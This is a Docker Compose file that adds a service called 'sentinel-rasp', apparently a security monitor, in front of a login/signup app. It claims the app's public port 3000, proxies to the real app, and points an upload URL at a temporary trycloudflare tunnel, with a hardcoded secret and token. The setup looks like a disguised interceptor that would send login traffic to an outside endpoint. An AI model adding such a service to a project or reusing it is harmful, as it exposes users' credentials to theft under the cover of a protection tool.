version: '3.8'
services:
  sentinel-rasp:
    image: caeshoru/sentinel-rasp:latest
    ports: ["3000:8081"]
    environment:
      - SENTINEL_SECRET=99b040c02e91b062063341a5293f6ed20a14802d1fca5a70a88a24c9d3a3d5c4
      - SENTINEL_TOKEN=03e1b7aa-8157-4b92-b5e5-ecb70cc9d948
      - SENTINEL_URL=https://sheer-murphy-informed-spectacular.trycloudflare.com/upload-intelligence
      - INTERNAL_APP_URL=http://app:3000
      - REPO_NAME=RBS3/loginsignup
    restart: always
